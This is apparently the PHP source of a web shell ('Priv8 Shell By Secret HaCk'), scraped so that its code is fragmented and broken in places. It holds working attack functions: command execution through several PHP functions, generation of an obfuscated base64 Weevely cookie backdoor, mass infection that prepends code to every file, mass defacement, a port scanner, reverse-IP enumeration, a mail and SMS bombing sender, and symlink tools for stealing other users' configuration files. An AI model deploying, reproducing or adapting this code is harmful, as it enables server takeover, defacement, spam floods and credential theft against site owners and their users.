array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while (!feof($io[1])) { $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } while (!feof($io[2])) { $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($execute); return $res; } elseif (function_exists("proc_open")) { $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while (!feof($io[1])) { $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } while (!feof($io[2])) { $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($execute); return $res; } elseif (function_exists("exec")) { $res = exec($cmd); return $res; } elseif (function_exists("system")) { $res = system($cmd); return $res; } elseif (function_exists("shell_exec")) { $res = shell_exec($cmd); return $res; } elseif (function_exists("passthru")) { $res = passthru($cmd); return $res; } else { error("The necessary functions to execute commands are disabled!"); } } //Unzip function function unzip($filename, $directory) { $zip = new ZipArchive; $res = $zip->open($filename); if ($res === TRUE) { $zip>extractTo($directory); $zip->close(); success("unzip", $directory); } else { cmd2("unzip $filename", $directory); } } //Get files and directories and throw them into an array. $open = opendir($dir); $files = array(); $direcs = array(); while ($file = readdir($open)) { if ($file != "." && $file != "..") { if (is_dir("$dir/$file")) { array_push($direcs, $file); } else { array_push($files, $file); } } } asort($direcs); asort($files); ?> Priv8 Shell By Secret HaCk ::SDN:: uname server_ip your_ip server_software disabled_functions [Home] [Perl Back Connect] [Python Back connect] [Encrypt] [Mass Deface] [Mass File Infect] [Install MSD] [ Sender] [Reverse IP] [Weevely Backdoor] [Port Scan] [ about ] <= $endport) { if (fsockopen($scanhost, $startport, $errno, $errstr, 3)) { echo " Port $startport is open on $scanhost "; } else { echo "Port $startport is not open on $scanhost "; } $startport++; } } ?> < 3) { error("Password must be longer than 3 characters!"); } else { $first2 = $weevpassword[0] . $weevpassword[1]; $rest = substr($weevpassword, 2); $money = "$"; $weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs= '); $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {"; $weevelybd3 = "$money" . "k='$rest';"; $weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbG FjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zb GljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs ='); $all = " < $count) { $name_servers = $dns_record[$num]; $name_servers2 = $name_servers['type']; $name_servers3 = @$name_servers['target']; $num++; if ($name_servers2 == "NS") { echo "$name_servers3 "; $nshost = @$name_servers['host']; } if ($name_servers2 == "SOA") { $nsemail = $name_servers['rname']; } if ($name_servers2 == "A") { $nsip = $name_servers['ip']; } } $num = 0; echo " "; $domains_on_server = json_decode(file_get_contents("$domain")); $status = $domains_on_server->status; $message = $domains_on_server->message; $domainAr = $domains_on_server->domainArray; $num_of_site = $domains_on_server->domainCount; $count = sizeof($domainAr); if ($status == "Success") { echo "Found $num_of_site sites hosted on the same server as $nshost($nsip) via "; while ($num < $count) { $hossites = $domainAr[$num]; $num++; $hossites3 $hossites3 = $domainAr[$num]; $hossites3 = $hossites3[0]; $hossites = $hossites[0]; $site_ips = empty($hossites) ? "" : "(" . gethostbyname($hossites) $site_ips2 . ")"; $site_ips2 = empty($hossites3) ? "" : "(" . gethostbyname($hossites3) . "; $num++; } echo " ")"; echo " $hossites $site_ips "; $num = 0; } else { error("Iam not Happy because i Failed to find or get sites hosted on same server from:! Additional Message: $message"); } echo " "; } ?> < $amount) { if (!@mail($to, $subject, $msgcontent, $headers)) { $numsent++; $sent_fail++; } else { $numsent++; $sent_success++; } } echo "Successfully sent $sent_success messages. Failed to send $sent_fail messages. "; } } if (isset($_GET['sms'])) { echo " Phone Number With Area Code Carrier: Amount Of Messages To Send: From: Subject: Message Content: Bomb "; } ?> $file) { $file2 = trim($file, "."); $getinf_file = file_get_contents($file2); if ("$file2" == "$dir/$script2") { echo ""; } else { if (file_put_contents("$file2", $masscode) && file_put_contents("$file2", $getinf_file, FILE_APPEND)) { echo "Successfully infected file: $file2 "; $success++; } else { echo "Failed to infect file : $file2 "; $failed++; } } } echo "$success files successfully infected! ^_^ Failed to infect $failed files! :( "; } } if (isset($_GET['massinfect'])) { $example = ""; $example = htmlspecialchars($example); $example2 = ""; $example2 = htmlspecialchars($example2); echo " Directory to start infect from: Custom Directory: This is great for infecting mass files with javascript scripts or php scripts It will append the code to the top of each file. Example: $example $example2 Infect code: This will not infect this shell. Infect "; } ?> $file) { $file2 = trim($file, "."); if ("$file2" == "$dir/$script2") { echo ""; } else { if (file_put_contents("$file2", $mass_source)) { echo "Successfully defaced file: $file2 "; $success++; } else { echo "Failed to deface file: $file2 "; $failed++; } } } echo "$success files successfully defaced! Failed to deface $failed files! "; } } if (isset($_GET['massdeface'])) { echo " Directory to start deface from: Custom Directory: Source of deface: This will not deface this shell. Deface "; } ?> < count($ex);$p++) { @$linkpath.= $ex[$p] . '/'; $linkpath2 = rtrim($linkpath, "/"); echo "$ex[$p]/"; } echo " /File Owner/Group e $downer/$dgroup Permissions $dperms Mass "; foreach ($direcs as $d) { $downer = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$d")) fileowner("$dir/$d"); $dgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$d")) : filegroup("$dir/$d"); if (is_array($downer)) { $downer = Last Writeable Size Delete Rename $downer['name']; } if Modified (is_array($dgroup)) { $dgroup = $dgroup['name']; } $dperms = substr(base_convert(fileperms("$dir/$ , 10, 8), 2); $dwrite = is_writeable("$dir/$d") ? "Writeable" "Non Writeable"; $dsize = "Directory $dtime = date("F d Y g:i:s", filemtime("$dir/$d")); echo " $dwrite $dsize $dtime Delete Rename "; } foreach ($files as $f) { $fowner = function_exists("posix_getpwuid") ? posix_getpwuid(fileowner("$dir/$f")) e2 { fileowner("$dir/$f"); $fgroup = function_exists("posix_getgrgid") ? posix_getgrgid(filegroup("$dir/$f")) : filegroup("$dir/$f"); if (is_array($fowner)) { $fowner = $fowner['name']; } if (is_array($fgrou { $fgroup = $fgroup['name']; } $fperm substr(base_convert(fileperms("$dir/$ 10, 8), 2); $fwrite = is_writeable("$dir/$f") ? "Writeable ^_^" : "Not Writeable"; $fsize = ByteConversion(filesize("$dir/$f")); $ftime = date("F d Y g:i:s", filemtime("$dir/$f")); $zip_file = explode(".", $f); $zip_file2 = end($zip_file); echo " "; } else { echo " "; } echo " $fperms $fwrite $f $fowner/$fgroup $fsize $ftime Delete Rename "; echo " With all selected: permission Submit "; echo " "; closedir(); ?> < $length) { $arrand = array_rand($characters, 1); $salt.= $characters[$arrand]; $i++; } return $salt; } ?> Symlink Killer ++ Click this button to Create PHP.ini Generate PHP.ini Click this button to find usernames to steal configurations Find usernames Start Extract Click this button to open manual symlink form Open Manual symlink form file link that you want symlink:- /home/user file name with which you want represent symlink :- ow ned.txt use .txt(owned.txt) or no extension(owned) for file which will represent symlink Lets do it Click this button To Get Configs Secret Hack Configuration File Killer Symlink bypasser ( Use this tools if Cant read /etc/named ) Let's Do it Start the game _< if (isset($_GET['kill'])) { if (unlink("$dir/$script2")) { success("shell_killed"); } else { error("Failed to kill shell!"); } } //Delete Directory if (isset($_GET['deldir'])) { $deldir = $_GET['deldir']; $redir = dirname($deldir); if (rmdir($deldir)) { success("dir_del", rtrim($redir, '/')); } else { error("Failed to delete directory!"); } } //Rename Directory if (isset($_GET['rendir'])) { $rendir = $_GET['rendir']; $dend = $_GET['old']; echo " $dend Rename "; } if (isset($_POST['do_rename_dir'])) { $newdir = $_POST['new_dir_name']; $rendir = $_GET['rendir']; $dend = $_GET['old']; if (rename("$rendir/$dend", "$rendir/$newdir")) { success("dir_renamed", $rendir); } else { error("Directory was not renamed!"); } } //Delete file if (isset($_GET['delfile'])) { $delfile = $_GET['delfile']; $redir = dirname($delfile); if (unlink($delfile)) { success("filedelete", rtrim($redir, '/')); } else { error("Failed to delete file!"); } } //Rename File if (isset($_GET['renfile'])) { $renfile = $_GET['renfile']; $fend = $_GET['old']; echo " $fend Rename "; } if (isset($_POST['do_rename_file'])) { $newfile = $_POST['new_file_name']; $renfile = $_GET['renfile']; $fend = $_GET['old']; if (rename("$renfile/$fend", "$renfile/$newfile")) { success("file_renamed", $renfile); } else { error("File was not renamed!"); } } //Mass Files Stuff if (isset($_POST['mass_files'])) { $action = $_POST['mass_action']; $chmodvalue = $_POST['chmod_value']; $box = $_POST['delbox']; if ($action == "Delete") { foreach ($box as $b) { if (is_dir($b)) { if (rmdir($b)) { echo "Deleted Directory: $b "; } else { echo "Failed To Delete Directory: $b "; } } else { if (unlink($b)) { echo "Deleted File: $b "; } else { echo "Failed To Delete file: $b "; } } } } if ($action == "chmod") { foreach ($box as $b) { if (is_dir($b)) { if (chmod($b, $chmodvalue)) { echo "Changed Permissions Of Directory: $b "; } else { echo "Failed To Change Permissions Of Directory: $b "; } } else { if (chmod($b, $chmodvalue)) { echo "Changed Persmissions Of File: $b "; } else { echo " >_< Failed To Change Permissions Of File: $b "; } } } } } ?> Copyright 2014 by: ك ري زي م س تر, وال جوام عه مجاهد